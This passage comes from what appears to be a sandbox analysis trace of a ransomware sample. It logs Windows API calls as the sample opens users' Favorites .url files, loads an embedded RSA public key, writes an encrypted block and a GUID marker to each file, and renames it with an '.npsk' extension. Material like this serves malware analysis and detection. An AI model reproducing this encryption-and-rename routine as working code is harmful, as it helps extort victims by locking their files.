(hHash=0x3277d68) returned 1 [0216.463] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.463] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.463] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.463] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.463] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.463] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.464] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.464] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.464] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.464] CloseHandle (hObject=0x61c) returned 1 [0216.465] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.npsk")) returned 1 [0216.466] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0216.466] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.466] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.466] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.466] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0216.466] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0216.466] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.466] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.466] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.466] PathFindFileNameW (pszPath="") returned="" [0216.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.467] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.467] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0216.467] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0216.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.468] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.468] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.470] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.470] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.470] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.471] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0216.471] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.471] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.471] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.472] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.472] GetLastError () returned 0x0 [0216.472] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.472] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0216.472] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.472] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.472] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.472] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.472] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.472] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.472] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.472] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.472] CloseHandle (hObject=0x61c) returned 1 [0216.473] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.npsk")) returned 1 [0216.475] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0216.475] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0216.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.475] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.475] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.477] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.477] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.478] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.478] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0216.479] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.479] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.479] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.479] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.479] GetLastError () returned 0x0 [0216.479] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.479] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0216.479] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.480] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.480] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.480] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.480] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.480] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.480] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.480] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.480] CloseHandle (hObject=0x61c) returned 1 [0216.481] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.npsk")) returned 1 [0216.483] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0216.483] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0216.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.483] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.483] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.485] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.485] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.486] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.486] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.486] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.486] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.486] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0216.487] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.487] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.487] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.487] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.487] GetLastError () returned 0x0 [0216.487] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.487] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0216.487] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.487] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.487] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.487] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.488] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.488] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.490] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.490] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.490] CloseHandle (hObject=0x61c) returned 1 [0216.491] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.npsk")) returned 